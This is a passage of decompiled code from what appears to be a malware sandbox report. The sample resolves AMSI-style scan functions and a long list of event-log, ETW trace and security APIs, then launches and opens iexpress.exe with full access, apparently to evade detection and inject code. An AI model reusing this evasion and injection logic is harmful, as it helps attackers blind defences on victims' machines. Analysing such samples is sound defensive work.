                                                                							E02514A98(_t2075 - 0x774, E02514D64( *((intOrPtr*)(_t2075 - 0x778))));
                                                                							_pop(_t2048);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x774)), _t1625, _t2048, _t2074);
                                                                							E02514A98(_t2075 - 0x77c, "SystemFunction035");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x77c)));
                                                                							E02514A98(_t2075 - 0x780, "advapi32");
                                                                							_pop(_t2051);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x780)), _t1625, _t2051, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x784, E02514D64( *((intOrPtr*)(_t2075 - 0x788))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x784)));
                                                                							_t1671 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x790, _t1671, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x78c, E02514D64( *((intOrPtr*)(_t2075 - 0x790))));
                                                                							_pop(_t2056);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x78c)), _t1625, _t2056, _t2074);
                                                                							E02514A98(_t2075 - 0x794, "ReportEventW");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x794)));
                                                                							E02514A98(_t2075 - 0x798, "advapi32");
                                                                							_pop(_t2059);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x798)), _t1625, _t2059, _t2074);
                                                                							E02524F34(E02514DBC(0x256da84), _t1625, _t1671, _t2073, _t2074, _t2087);
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x79c, E02514D64( *((intOrPtr*)(_t2075 - 0x7a0))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x79c)));
                                                                				_t1646 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x7a8, _t1646, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x7a4, E02514D64( *((intOrPtr*)(_t2075 - 0x7a8))));
                                                                				_pop(_t1752); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x7a4)), _t1625, _t1752, _t2074);
                                                                				_t776 =  *0x256dce8; // 0x0
                                                                				E02514CB0(_t776, 0x252ae54);
                                                                				if(_t2084 == 0) {
                                                                					_t1325 =  *0x256dce4; // 0x2a51b88
                                                                					E02514CB0(_t1325, 0x252ae54);
                                                                					if(_t2084 != 0) {
                                                                						_t1327 =  *0x256dcec; // 0x0
                                                                						E02514CB0(_t1327, 0x252ae54);
                                                                						if(_t2084 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x7ac, E02514D64( *((intOrPtr*)(_t2075 - 0x7b0))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7ac)));
                                                                							_t1660 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x7b8, _t1660, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x7b4, E02514D64( *((intOrPtr*)(_t2075 - 0x7b8))));
                                                                							_pop(_t1983);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7b4)), _t1625, _t1983, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x7bc, E02514D64( *((intOrPtr*)(_t2075 - 0x7c0))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7bc)));
                                                                							_t1661 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x7c8, _t1661, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x7c4, E02514D64( *((intOrPtr*)(_t2075 - 0x7c8))));
                                                                							_pop(_t1988);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7c4)), _t1625, _t1988, _t2074);
                                                                							WinExec("iexpress", 0);
                                                                							 *0x256da9c = E025245F8("iexpress.exe");
                                                                							_t1360 =  *0x256da9c; // 0x0
                                                                							 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t1360);
                                                                							_t1362 =  *0x256daa0; // 0x0
                                                                							_push(_t1362);
                                                                							L025237E0();
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x7cc, E02514D64( *((intOrPtr*)(_t2075 - 0x7d0))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7cc)));
                                                                							_t1662 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x7d8, _t1662, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x7d4, E02514D64( *((intOrPtr*)(_t2075 - 0x7d8))));
                                                                							_pop(_t1993);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7d4)), _t1625, _t1993, _t2074);
                                                                							_t1378 = E02514DBC(0x256da84);
                                                                							_t1379 =  *0x256daa0; // 0x0
                                                                							E02523F94(_t1379, _t1625, _t1378, _t2073, _t2074, _t2087);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x7dc, E02514D64( *((intOrPtr*)(_t2075 - 0x7e0))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7dc)));
                                                                							_t1663 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x7e8, _t1663, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x7e4, E02514D64( *((intOrPtr*)(_t2075 - 0x7e8))));
                                                                							_pop(_t1999);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7e4)), _t1625, _t1999, _t2074);
                                                                							E02514A98(_t2075 - 0x7ec, "ReportEventA");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7ec)));
                                                                							E02514A98(_t2075 - 0x7f0, "advapi32");
                                                                							_pop(_t2002);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7f0)), _t1625, _t2002, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x7f4, E02514D64( *((intOrPtr*)(_t2075 - 0x7f8))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x7f4)));
                                                                							_t1664 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x800, _t1664, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x7fc, E02514D64( *((intOrPtr*)(_t2075 - 0x800))));
                                                                							_pop(_t2007);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x7fc)), _t1625, _t2007, _t2074);
                                                                							E02514A98(_t2075 - 0x804, "SystemFunction035");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x804)));
                                                                							E02514A98(_t2075 - 0x808, "advapi32");
                                                                							_pop(_t2010);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x808)), _t1625, _t2010, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x80c, E02514D64( *((intOrPtr*)(_t2075 - 0x810))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x80c)));
                                                                							_t1665 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x818, _t1665, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x814, E02514D64( *((intOrPtr*)(_t2075 - 0x818))));
                                                                							_pop(_t2015);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x814)), _t1625, _t2015, _t2074);
                                                                							E02514A98(_t2075 - 0x81c, "ReportEventW");
                                                                							_push( *((intOrPtr*)(_t2075 - 0x81c)));
                                                                							E02514A98(_t2075 - 0x820, "advapi32");
                                                                							_pop(_t2018);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x820)), _t1625, _t2018, _t2074);
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x824, E02514D64( *((intOrPtr*)(_t2075 - 0x828))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x824)));
                                                                							_t1666 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x830, _t1666, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x82c, E02514D64( *((intOrPtr*)(_t2075 - 0x830))));
                                                                							_pop(_t2023);
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x82c)), _t1625, _t2023, _t2074);
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x834, E02514D64( *((intOrPtr*)(_t2075 - 0x838))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x834)));
                                                                				_t1647 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x840, _t1647, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x83c, E02514D64( *((intOrPtr*)(_t2075 - 0x840))));
                                                                				_pop(_t1758); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x83c)), _t1625, _t1758, _t2074);
                                                                				_t792 =  *0x256dce4; // 0x2a51b88
                                                                				E02514CB0(_t792, 0x252ae54);
                                                                				if(_t2084 == 0) {
                                                                					_t1286 =  *0x256dce8; // 0x0
                                                                					E02514CB0(_t1286, 0x252ae54);
                                                                					if(_t2084 != 0) {
                                                                						_t1288 =  *0x256dcec; // 0x0
                                                                						E02514CB0(_t1288, 0x252ae54);
                                                                						if(_t2084 != 0) {
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanBuffer");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x844, E02514D64( *((intOrPtr*)(_t2075 - 0x848))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x844)));
                                                                							_t1658 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x850, _t1658, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x84c, E02514D64( *((intOrPtr*)(_t2075 - 0x850))));
                                                                							_pop(_t1969); // executed
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x84c)), _t1625, _t1969, _t2074); // executed
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98(_t2075 - 0x854, E02514D64( *((intOrPtr*)(_t2075 - 0x858))));
                                                                							_push( *((intOrPtr*)(_t2075 - 0x854)));
                                                                							_t1659 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0(_t2075 - 0x860, _t1659, 0x252ad5c);
                                                                							E02514A98(_t2075 - 0x85c, E02514D64( *((intOrPtr*)(_t2075 - 0x860))));
                                                                							_pop(_t1974); // executed
                                                                							E025236CC( *((intOrPtr*)(_t2075 - 0x85c)), _t1625, _t1974, _t2074); // executed
                                                                							E02512FC4(0, _t2075 - 0x864);
                                                                							_push( *((intOrPtr*)(_t2075 - 0x864)));
                                                                							_t1322 = E02514DBC(0x256da84);
                                                                							_pop(_t1323); // executed
                                                                							E025248A4(_t1323, _t1625, _t1322, _t2074, _t2087); // executed
                                                                						}
                                                                					}
                                                                				}
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push(0x252b020);
                                                                				_push(0);
                                                                				_push(0x252b02c);
                                                                				_push(0);
                                                                				_push(0x252b038);
                                                                				_push(0);
                                                                				_push(0x252b044);
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x868, E02514D64( *((intOrPtr*)(_t2075 - 0x86c))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x868)));
                                                                				_t1648 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x874, _t1648, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x870, E02514D64( *((intOrPtr*)(_t2075 - 0x874))));
                                                                				_pop(_t1764); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x870)), _t1625, _t1764, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x878, "ReportEventA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x878)));
                                                                				E02514A98(_t2075 - 0x87c, "advapi32");
                                                                				_pop(_t1767); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x87c)), _t1625, _t1767, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x880, E02514D64( *((intOrPtr*)(_t2075 - 0x884))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x880)));
                                                                				_t1649 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x88c, _t1649, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x888, E02514D64( *((intOrPtr*)(_t2075 - 0x88c))));
                                                                				_pop(_t1772); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x888)), _t1625, _t1772, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x890, "SystemFunction035");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x890)));
                                                                				E02514A98(_t2075 - 0x894, "advapi32");
                                                                				_pop(_t1775); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x894)), _t1625, _t1775, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x898, E02514D64( *((intOrPtr*)(_t2075 - 0x89c))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x898)));
                                                                				_t1650 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x8a4, _t1650, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x8a0, E02514D64( *((intOrPtr*)(_t2075 - 0x8a4))));
                                                                				_pop(_t1780); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8a0)), _t1625, _t1780, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x8a8, "ReportEventW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8a8)));
                                                                				E02514A98(_t2075 - 0x8ac, "advapi32");
                                                                				_pop(_t1783); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8ac)), _t1625, _t1783, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("ScanString");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x8b0, E02514D64( *((intOrPtr*)(_t2075 - 0x8b4))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8b0)));
                                                                				_t1651 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x8bc, _t1651, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x8b8, E02514D64( *((intOrPtr*)(_t2075 - 0x8bc))));
                                                                				_pop(_t1788); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8b8)), _t1625, _t1788, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x8c0, "ShellExecuteExA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8c0)));
                                                                				E02514A98(_t2075 - 0x8c4, "shell32");
                                                                				_pop(_t1791); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8c4)), _t1625, _t1791, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x8c8, "SuspendThread");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8c8)));
                                                                				E02514A98(_t2075 - 0x8cc, "kernel32");
                                                                				_pop(_t1794);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8cc)), _t1625, _t1794, _t2074);
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("OpenSession");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x8d0, E02514D64( *((intOrPtr*)(_t2075 - 0x8d4))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8d0)));
                                                                				_t1652 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x8dc, _t1652, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x8d8, E02514D64( *((intOrPtr*)(_t2075 - 0x8dc))));
                                                                				_pop(_t1799); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8d8)), _t1625, _t1799, _t2074); // executed
                                                                				_push(0x252ad5c);
                                                                				_push( *0x256dcd8);
                                                                				_push("Initialize");
                                                                				E02514C24();
                                                                				E02514A98(_t2075 - 0x8e0, E02514D64( *((intOrPtr*)(_t2075 - 0x8e4))));
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8e0)));
                                                                				_t1653 =  *0x256dcd8; // 0x2a51b38
                                                                				E02514BB0(_t2075 - 0x8ec, _t1653, 0x252ad5c);
                                                                				E02514A98(_t2075 - 0x8e8, E02514D64( *((intOrPtr*)(_t2075 - 0x8ec))));
                                                                				_pop(_t1804); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8e8)), _t1625, _t1804, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x8f0, "WmiReceiveNotificationsW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8f0)));
                                                                				E02514A98(_t2075 - 0x8f4, "advapi32");
                                                                				_pop(_t1807); // executed
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8f4)), _t1625, _t1807, _t2074); // executed
                                                                				E02514A98(_t2075 - 0x8f8, "WmiReceiveNotificationsA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x8f8)));
                                                                				E02514A98(_t2075 - 0x8fc, "advapi32");
                                                                				_pop(_t1810);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x8fc)), _t1625, _t1810, _t2074);
                                                                				E02514A98(_t2075 - 0x900, "WmiQuerySingleInstanceW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x900)));
                                                                				E02514A98(_t2075 - 0x904, "advapi32");
                                                                				_pop(_t1813);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x904)), _t1625, _t1813, _t2074);
                                                                				E02514A98(_t2075 - 0x908, "NotifyChangeEventLog");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x908)));
                                                                				E02514A98(_t2075 - 0x90c, "advapi32");
                                                                				_pop(_t1816);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x90c)), _t1625, _t1816, _t2074);
                                                                				E02514A98(_t2075 - 0x910, "WmiQueryAllDataA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x910)));
                                                                				E02514A98(_t2075 - 0x914, "advapi32");
                                                                				_pop(_t1819);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x914)), _t1625, _t1819, _t2074);
                                                                				E02514A98(_t2075 - 0x918, "WmiOpenBlock");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x918)));
                                                                				E02514A98(_t2075 - 0x91c, "advapi32");
                                                                				_pop(_t1822);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x91c)), _t1625, _t1822, _t2074);
                                                                				E02514A98(_t2075 - 0x920, "WmiNotificationRegistrationW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x920)));
                                                                				E02514A98(_t2075 - 0x924, "advapi32");
                                                                				_pop(_t1825);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x924)), _t1625, _t1825, _t2074);
                                                                				E02514A98(_t2075 - 0x928, "TraceQueryInformation");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x928)));
                                                                				E02514A98(_t2075 - 0x92c, "advapi32");
                                                                				_pop(_t1828);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x92c)), _t1625, _t1828, _t2074);
                                                                				E02514A98(_t2075 - 0x930, "TraceSetInformation");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x930)));
                                                                				E02514A98(_t2075 - 0x934, "advapi32");
                                                                				_pop(_t1831);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x934)), _t1625, _t1831, _t2074);
                                                                				E02514A98(_t2075 - 0x938, "TraceMessageVa");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x938)));
                                                                				E02514A98(_t2075 - 0x93c, "advapi32");
                                                                				_pop(_t1834);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x93c)), _t1625, _t1834, _t2074);
                                                                				E02514A98(_t2075 - 0x940, "TraceMessage");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x940)));
                                                                				E02514A98(_t2075 - 0x944, "advapi32");
                                                                				_pop(_t1837);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x944)), _t1625, _t1837, _t2074);
                                                                				E02514A98(_t2075 - 0x948, "TraceEvent");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x948)));
                                                                				E02514A98(_t2075 - 0x94c, "advapi32");
                                                                				_pop(_t1840);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x94c)), _t1625, _t1840, _t2074);
                                                                				E02514A98(_t2075 - 0x950, "TraceEventInstance");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x950)));
                                                                				E02514A98(_t2075 - 0x954, "advapi32");
                                                                				_pop(_t1843);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x954)), _t1625, _t1843, _t2074);
                                                                				E02514A98(_t2075 - 0x958, "SetTraceCallback");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x958)));
                                                                				E02514A98(_t2075 - 0x95c, "advapi32");
                                                                				_pop(_t1846);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x95c)), _t1625, _t1846, _t2074);
                                                                				E02514A98(_t2075 - 0x960, "SetSecurityInfo");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x960)));
                                                                				E02514A98(_t2075 - 0x964, "advapi32");
                                                                				_pop(_t1849);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x964)), _t1625, _t1849, _t2074);
                                                                				E02514A98(_t2075 - 0x968, "SetSecurityInfoExA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x968)));
                                                                				E02514A98(_t2075 - 0x96c, "advapi32");
                                                                				_pop(_t1852);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x96c)), _t1625, _t1852, _t2074);
                                                                				E02514A98(_t2075 - 0x970, "SetSecurityInfoExW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x970)));
                                                                				E02514A98(_t2075 - 0x974, "advapi32");
                                                                				_pop(_t1855);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x974)), _t1625, _t1855, _t2074);
                                                                				E02514A98(_t2075 - 0x978, "SetSecurityAccessMask");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x978)));
                                                                				E02514A98(_t2075 - 0x97c, "advapi32");
                                                                				_pop(_t1858);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x97c)), _t1625, _t1858, _t2074);
                                                                				E02514A98(_t2075 - 0x980, "SetPrivateObjectSecurityEx");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x980)));
                                                                				E02514A98(_t2075 - 0x984, "advapi32");
                                                                				_pop(_t1861);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x984)), _t1625, _t1861, _t2074);
                                                                				E02514A98(_t2075 - 0x988, "SetKernelObjectSecurity");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x988)));
                                                                				E02514A98(_t2075 - 0x98c, "advapi32");
                                                                				_pop(_t1864);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x98c)), _t1625, _t1864, _t2074);
                                                                				E02514A98(_t2075 - 0x990, "SetFileSecurityW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x990)));
                                                                				E02514A98(_t2075 - 0x994, "advapi32");
                                                                				_pop(_t1867);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x994)), _t1625, _t1867, _t2074);
                                                                				E02514A98(_t2075 - 0x998, "SetFileSecurityA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x998)));
                                                                				E02514A98(_t2075 - 0x99c, "advapi32");
                                                                				_pop(_t1870);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x99c)), _t1625, _t1870, _t2074);
                                                                				E02514A98(_t2075 - 0x9a0, "SaferSetPolicyInformation");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9a0)));
                                                                				E02514A98(_t2075 - 0x9a4, "advapi32");
                                                                				_pop(_t1873);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9a4)), _t1625, _t1873, _t2074);
                                                                				E02514A98(_t2075 - 0x9a8, "SaferSetLevelInformation");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9a8)));
                                                                				E02514A98(_t2075 - 0x9ac, "advapi32");
                                                                				_pop(_t1876);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9ac)), _t1625, _t1876, _t2074);
                                                                				E02514A98(_t2075 - 0x9b0, "ReportEventW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9b0)));
                                                                				E02514A98(_t2075 - 0x9b4, "advapi32");
                                                                				_pop(_t1879);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9b4)), _t1625, _t1879, _t2074);
                                                                				E02514A98(_t2075 - 0x9b8, "ReportEventA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9b8)));
                                                                				E02514A98(_t2075 - 0x9bc, "advapi32");
                                                                				_pop(_t1882);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9bc)), _t1625, _t1882, _t2074);
                                                                				E02514A98(_t2075 - 0x9c0, "ReadEventLogW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9c0)));
                                                                				E02514A98(_t2075 - 0x9c4, "advapi32");
                                                                				_pop(_t1885);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9c4)), _t1625, _t1885, _t2074);
                                                                				E02514A98(_t2075 - 0x9c8, "ReadEventLogA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9c8)));
                                                                				E02514A98(_t2075 - 0x9cc, "advapi32");
                                                                				_pop(_t1888);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9cc)), _t1625, _t1888, _t2074);
                                                                				E02514A98(_t2075 - 0x9d0, "OpenEventLogW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9d0)));
                                                                				E02514A98(_t2075 - 0x9d4, "advapi32");
                                                                				_pop(_t1891);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9d4)), _t1625, _t1891, _t2074);
                                                                				E02514A98(_t2075 - 0x9d8, "OpenEventLogA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9d8)));
                                                                				E02514A98(_t2075 - 0x9dc, "advapi32");
                                                                				_pop(_t1894);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9dc)), _t1625, _t1894, _t2074);
                                                                				E02514A98(_t2075 - 0x9e0, "SaferRecordEventLogEntry");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9e0)));
                                                                				E02514A98(_t2075 - 0x9e4, "advapi32");
                                                                				_pop(_t1897);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9e4)), _t1625, _t1897, _t2074);
                                                                				E02514A98(_t2075 - 0x9e8, "GetEventLogInformation");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9e8)));
                                                                				E02514A98(_t2075 - 0x9ec, "advapi32");
                                                                				_pop(_t1900);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9ec)), _t1625, _t1900, _t2074);
                                                                				E02514A98(_t2075 - 0x9f0, "ElfReadEventLogW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9f0)));
                                                                				E02514A98(_t2075 - 0x9f4, "advapi32");
                                                                				_pop(_t1903);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9f4)), _t1625, _t1903, _t2074);
                                                                				E02514A98(_t2075 - 0x9f8, "ElfReadEventLogA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0x9f8)));
                                                                				E02514A98(_t2075 - 0x9fc, "advapi32");
                                                                				_pop(_t1906);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0x9fc)), _t1625, _t1906, _t2074);
                                                                				E02514A98(_t2075 - 0xa00, "ElfOpenEventLogW");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa00)));
                                                                				E02514A98(_t2075 - 0xa04, "advapi32");
                                                                				_pop(_t1909);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa04)), _t1625, _t1909, _t2074);
                                                                				E02514A98(_t2075 - 0xa08, "ElfOpenEventLogA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa08)));
                                                                				E02514A98(_t2075 - 0xa0c, "advapi32");
                                                                				_pop(_t1912);
                                                                				E025236CC( *((intOrPtr*)(_t2075 - 0xa0c)), _t1625, _t1912, _t2074);
                                                                				E02514A98(_t2075 - 0xa10, "BuildSecurityDescriptorA");
                                                                				_push( *((intOrPtr*)(_t2075 - 0xa10)));
                                                                				E02514A98(_t2075 - 0xa14, "advapi32");
